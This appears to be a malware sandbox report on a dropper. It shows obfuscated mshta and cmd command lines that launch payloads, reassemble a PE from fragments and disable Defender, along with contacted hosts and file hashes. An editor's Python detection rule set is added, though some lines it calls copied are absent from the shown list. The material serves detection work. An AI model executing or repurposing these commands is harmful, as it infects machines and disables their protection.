"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE (CReAteObJect("WScRipT.ShELL" ). RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if """" == """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe"" ) do taskkill -Im ""%~nXz"" /F " , 0 , TrUe ) )

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if "" == "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe" ) do taskkill -Im "%~nXz" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe" ) do taskkill /F -Im "%~NxU"

C:\Users\Admin\AppData\Local\Temp\09xU.exE

09xU.EXE -pPtzyIkqLZoCarb5ew

C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe

H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "Sat06f5ed0e3bb24.exe" /F

C:\Windows\SysWOW64\taskkill.exe

taskkill /F -Im "Sat0663b341399ee.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE (CReAteObJect("WScRipT.ShELL" ). RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if ""/paMxRK9ViV3PT5Jnz5"" == """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" ) do taskkill -Im ""%~nXz"" /F " , 0 , TrUe ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if "/paMxRK9ViV3PT5Jnz5" == "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" ) do taskkill -Im "%~nXz" /F

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRIpt: cLosE ( CREAteobjEcT ( "WscRiPt.SHeLl" ). rUN ("C:\Windows\system32\cmd.exe /Q /r eCho NqN%TIME%> FvfG42h.8 & echo | Set /P = ""MZ"" > IiKZCUV.MQ & CoPY /Y /b iIKZCUV.MQ + 6H87pFZ.4 + FDKD47Ef.I1 + U56d.R + JB946RB.I7A + Q_tW.pL + BTDIJ1.FYL + FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM " , 0 ,True ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /Q /r eCho NqN%TIME%> FvfG42h.8& echo | Set /P = "MZ" > IiKZCUV.MQ & CoPY /Y /b iIKZCUV.MQ + 6H87pFZ.4 +FDKD47Ef.I1+ U56d.R + JB946RB.I7A + Q_tW.pL + BTDIJ1.FYL + FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>IiKZCUV.MQ"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe /y .\xHnBBPN.0kM

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2812 -s 440

C:\Windows\SysWOW64\control.exe

control .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I

C:\Users\Admin\AppData\Local\Temp\f7871e5.exe

"C:\Users\Admin\AppData\Local\Temp\f7871e5.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2524 -s 652

C:\Users\Admin\AppData\Local\Temp\f78aa43.exe

"C:\Users\Admin\AppData\Local\Temp\f78aa43.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1572 -s 652
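
Three patterns in the process list above are worth turning into detections. First, the Defender tampering run through cmd.exe and powershell.exe: Set-MpPreference with -DisableRealtimeMonitoring $true, -SubmitSamplesConsent NeverSend and -MAPSReporting Disable, then Add-MpPreference -ExclusionPath on the Temp directory the payloads are dropped into. Second, the mshta.exe one-liners with an inline vbscript: URI that copy a dropped executable to a random name, start it with a password-style argument and taskkill the original by image name. Third, the fragment-reassembly trick: `echo | set /p = "MZ"` writes a two-byte PE header into a file, `copy /b` concatenates it with the other dropped fragments, and the result is loaded by `control`, by `rundll32 shell32.dll,Control_RunDLL` (the report also shows the ordinal form `shell32.dll,#44`) or by `msiexec /y`, none of which care about the file extension. The randomised casing (`cOpY`, `vBscRIpT`, `StArT`) and the `-Im` spelling of `/IM` are there to defeat naive string matches, so any rule has to be case-insensitive and accept both switch characters. The Python below is an added example and not part of the sandbox report: a small rule set over command lines, run against lines copied from this process list plus two constructed benign lines that must not fire. Rule names are the editor's own.

```python
import re
from collections import Counter

# Constructed sample: indices 0-6 are command lines copied from the process
# list above; 7-8 are benign lines added here as negative cases.
SAMPLE_CMDLINES = [
    r'C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable',
    r'powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"',
    r'"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE (CReAteObJect("WScRipT.ShELL" ). RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if """" == """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe"" ) do taskkill -Im ""%~nXz"" /F " , 0 , TrUe ) )',
    r'"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I',
    r'msiexec.exe /y .\xHnBBPN.0kM',
    r'"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I',
    r'"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat0675f75df01bdb.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0675f75df01bdb.exe" & exit',
    r'"C:\Windows\System32\control.exe" appwiz.cpl',
    r'powershell -NoProfile -Command Get-MpPreference',
]

# All rules are case-insensitive; switches accept both "/" and "-" where the
# sample mixes them. Rule names are the editor's own, not a vendor taxonomy.
RULES = {
    "defender_realtime_disabled": re.compile(
        r'set-mppreference\b.*-disablerealtimemonitoring\s+\$?true', re.I),
    "defender_cloud_reporting_off": re.compile(
        r'set-mppreference\b.*(-mapsreporting\s+(disable|0)\b|-submitsamplesconsent\s+(neversend|2)\b)', re.I),
    "defender_exclusion_added": re.compile(
        r'add-mppreference\b.*-exclusion(path|process|extension)\b', re.I),
    "mshta_inline_script": re.compile(
        r'mshta(\.exe)?"?\s+(vbscript|javascript):', re.I),
    # "MZ" written with set /p, then copy /b glues the fragments into a PE.
    "mz_header_fragment_reassembly": re.compile(
        r'set\s*/p\s*=\s*"?mz"?.*\bcopy\b(?:\s+/[by])+', re.I),
    # control.exe given a path-like argument that is not a .cpl file.
    "control_loads_non_cpl": re.compile(
        r'\bcontrol(\.exe)?"?\s+(?!.*\.cpl\b)\S*[\\.]\S*', re.I),
    # msiexec /y (or /z) calls DllRegisterServer/DllUnregisterServer on any DLL.
    "msiexec_dll_register": re.compile(
        r'\bmsiexec(\.exe)?"?\s+/[yz]\b', re.I),
    "rundll32_control_rundll": re.compile(
        r'rundll32(\.exe)?"?\s+.*shell32\.dll"?,\s*(control_rundll|#44)\b', re.I),
    # copy-to-new-name followed by taskkill of the source, or taskkill then erase.
    "kill_and_remove_original": re.compile(
        r'\bcopy\b.*\btaskkill\b\s+(?:[/-]\S+\s+)*[/-]im\b|\btaskkill\b.*\b(erase|del)\b\s', re.I),
}


def classify(cmdline):
    """Sorted names of every rule that fires on one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))


def scan(cmdlines):
    """Map each flagged command line to its rule hits; clean lines are omitted."""
    hits = {}
    for cmdline in cmdlines:
        rules = classify(cmdline)
        if rules:
            hits[cmdline] = rules
    return hits


def rule_counts(cmdlines):
    """How often each rule fired across a whole process list."""
    counts = Counter()
    for rules in scan(cmdlines).values():
        counts.update(rules)
    return counts


if __name__ == "__main__":
    for cmdline, rules in scan(SAMPLE_CMDLINES).items():
        print(", ".join(rules), "<-", cmdline[:90])
    print(dict(rule_counts(SAMPLE_CMDLINES)))
```

In a real pipeline these rules belong on process-creation telemetry (Sysmon event 1 or EDR equivalents) where the full command line is available; the mshta rule in particular only works because the sandbox recorded the inline script argument, which is also why the later cmd.exe children (`cmd.exe /S /D /c" echo "`) look harmless on their own.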

Network

Country Destination Domain Proto
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 gazrxlog.xyz udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
N/A 127.0.0.1:49264 tcp
N/A 127.0.0.1:49268 tcp
US 8.8.8.8:53 whealclothing.xyz udp
US 8.8.8.8:53 my-all-group.bar udp
US 8.8.8.8:53 m525-blockchain31432.bar udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
FR 91.121.67.60:23325 tcp
US 72.84.118.132:8080 tcp
FR 91.121.67.60:23325 tcp
US 72.84.118.132:8080 tcp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.23.210.75:80 r11.o.lencr.org tcp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.18:80 crl.microsoft.com tcp
FR 91.121.67.60:23325 tcp

Files

\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe

MD5 a979670adefae9ab376382f3229f3f28
SHA1 5b5b75a789e46a2f8ac02fba3d895fa968387c9b
SHA256 a8ae45e63487b6dd93bf61429d996be4abc922785e893717cdecd84b0b6f2040
SHA512 f023b21556d5ba5cd747f02ccc99ee1a27fea1d1c675615efa31664301b53dacb253f1b92356a8aea7ab0eba77e89d0fea7d0ba088bc17599fe55278e0fb744b

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/2812-46-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2812-49-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2812-62-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2812-66-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2812-68-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2812-67-0x0000000064941000-0x000000006494F000-memory.dmp

memory/2812-65-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2812-64-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2812-63-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2812-61-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2812-60-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2812-59-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2812-58-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2812-57-0x000000006FE40000-0x000000006FFC6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0618d93ac2c5c.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06ebc37d1c94352.exe

MD5 e9133ca1a95483a3331d0f336685302d
SHA1 48c1348e20b26be8227ed63a1db0f13716f1b8e3
SHA256 1145ee6af1fb495cb10eda71b3377e5ff6a21224c613f598c1c736fb6eaac58b
SHA512 009c74131d2fa256e55a4735eee2b498a673a7857635e78f12e442b27025a99562356ccb8db15c4119e6b2ff477a07f85db8290f58f4821626bae0f729b61f57

memory/2700-115-0x0000000000400000-0x000000000089B000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 91c3dea509f72adb8d5e130c0adae53d
SHA1 e3a51b073755b0e3cb66b370b77609cdb80c17ca
SHA256 60f0083d4d8c81af9c05cdf7099dc78fe8f76b55c0c71665868fb016186c313b
SHA512 c66cdc4c151d6b10bfe5f2bbd104bbf4ae3d59c6dfdcf8442dc1a6d797df3012d199508e89df7797c78f7d159e931be5b5ba374a02754ed1b3c3ad5d9319b4eb

\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0647140c100d63.exe

MD5 10e13cc7b41d162ab578256f27d297b1
SHA1 1d938b7e6e99951d9b8139f078483539120021e6
SHA256 7c91657c83118c91043fcdb9d616fbf219acc7ea7d793e3276e8ee801d1576c9
SHA512 22769c54259f0f82eed0f6d8d8c0d0040acf276baab8e75ed7832c771f1544939918ada9d1bc386acca0db84a0291f5932fff0f5d131e1127aff87811353e3cd

\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe

MD5 7c6b2dc2c253c2a6a3708605737aa9ae
SHA1 cf4284f29f740b4925fb2902f7c3f234a5744718
SHA256 b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba
SHA512 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

memory/2056-132-0x0000000000830000-0x0000000000898000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe

MD5 0e05650d436fd4d92775cd4f65973870
SHA1 4d13aaa6b18630d0c89400cee5933130f03bd762
SHA256 42c9a8d4eba1a23988476036c02318b3452e3ba835cb08786771ba63f6803b16
SHA512 6cf7a676cc7d5114293add15dd8fe029ef7e145183ac550600e7c0c85be33e0b2c42f0456838807971c4e122599a7d42fc33f44ca606cf24fbaaf8b43196ac08

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat060fd7e42d2.exe

MD5 29c9683aa48f1e3a29168f6b0ff3be04
SHA1 f2fde0bb1404e724387c4a4445d3e7c2c07d8d3f
SHA256 e46b9e2dd407bf942a3d19b75277ae6893a0b6c87e2df9d6047a9b35ebc53901
SHA512 a7092b9e781512a6f8f2fdcefb45cfb026a6e1f8762b06c0e969c8d52389d22e3d111ae67ba82bf49ad462953091def927ba911eb7dabee061f68d4aacde9891

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe

MD5 1cc8a64b178076dca421fedc3a248a56
SHA1 db8ed444965577dfb6db4f92ddd8d96a157ddea5
SHA256 1f7a19b62d2e0dfddefe2d8e829bd1af457806d61bc650aa9e3ed340a0886345
SHA512 c77b3c1ca13b18b6335b93106c285c4c9fdade11e0d1ab022cb4465228b2d8a0325a930e1b371e66973e36188fac023ae96eac0ff9921d63dc9734a38deb07ff

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0675f75df01bdb.exe

MD5 dd2fdd69b9db1cf5764dcfd429a1cf5e
SHA1 c45f13f1e2d166ff7ea70786d51b2fdd3bdea2e8
SHA256 d22db6b8e674124371143c301994af4326668dbdfe3dcdc5fdd949d066057afe
SHA512 c4aa0a831701e0ac9ca5bf7da6d46cd1a02d44248a2a4e85a3c79205182d245490245bdd90a357def492bb984249987097af70aed71331c12f8e238b10f2b60d

\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0619212f22dd7.exe

MD5 854ea0bc0602795b95da3be8257c530f
SHA1 f243a71edc902ed91d0f990630a73d0d01828c73
SHA256 c01e2d31948bc4de2df55929062171e7dbc85b84ee764b799520d6f0740e1e1e
SHA512 2a2b55cdbc3d62fc26af219d88b31f87782a8a550d273997d6d383a877c85529c8f0c7983c77ef4f176a2ce32119fd8733658aeb86de9215629c0e6012ce544c

memory/1032-154-0x0000000000FD0000-0x0000000000FEA000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/1032-161-0x0000000000260000-0x0000000000266000-memory.dmp

memory/2896-160-0x00000000026D0000-0x00000000028D2000-memory.dmp

memory/1816-162-0x0000000002810000-0x000000000295C000-memory.dmp

memory/2812-172-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2812-171-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2812-170-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2812-169-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2812-167-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2812-163-0x0000000000400000-0x000000000051B000-memory.dmp

memory/2860-173-0x0000000000400000-0x0000000000883000-memory.dmp

memory/2896-175-0x0000000002CD0000-0x0000000002D75000-memory.dmp

memory/2896-179-0x0000000002D80000-0x0000000002E12000-memory.dmp

memory/2896-176-0x0000000002D80000-0x0000000002E12000-memory.dmp

memory/1816-181-0x0000000002810000-0x000000000295C000-memory.dmp

memory/2896-180-0x00000000026D0000-0x00000000028D2000-memory.dmp

memory/1656-194-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1656-192-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1656-191-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1656-190-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1656-188-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1656-186-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1656-184-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1656-182-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1816-196-0x0000000002CE0000-0x0000000002D85000-memory.dmp

memory/1816-200-0x0000000002D90000-0x0000000002E22000-memory.dmp

memory/1816-197-0x0000000002D90000-0x0000000002E22000-memory.dmp

memory/2896-202-0x0000000002D80000-0x0000000002E12000-memory.dmp

memory/2896-203-0x0000000002E20000-0x00000000038ED000-memory.dmp

memory/2896-204-0x0000000000930000-0x00000000009BB000-memory.dmp

memory/2896-205-0x00000000038F0000-0x0000000003976000-memory.dmp

memory/2896-208-0x00000000038F0000-0x0000000003976000-memory.dmp

memory/2896-206-0x00000000038F0000-0x0000000003976000-memory.dmp

memory/2896-210-0x00000000000A0000-0x00000000000A4000-memory.dmp

memory/2896-209-0x0000000000090000-0x0000000000091000-memory.dmp

memory/1816-217-0x0000000002D90000-0x0000000002E22000-memory.dmp

memory/1816-218-0x0000000002E30000-0x0000000003B71000-memory.dmp

memory/1816-219-0x0000000003B80000-0x0000000003C0B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\f7871e5.exe

MD5 a014b8961283f1e07d7f31ecdd7db62f
SHA1 70714b6dc8abbaa5d1cba38c047ea3a4ec6ac065
SHA256 21ce0cdfaeb6d7f58bd17545be18f9cd3ac2476939112872d1a05d3164098f89
SHA512 bd0bb1405c7d74c941c5db0d3fd5fbe93544055f79db5076ab293c868568873df98f902c343096ff765be6c4911435617aab2ada15591dfc90606b5630d64869

memory/2524-276-0x0000000000340000-0x0000000000348000-memory.dmp

memory/1572-293-0x0000000000D90000-0x0000000000D98000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe

"C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe"

C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe

"C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe" -u

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
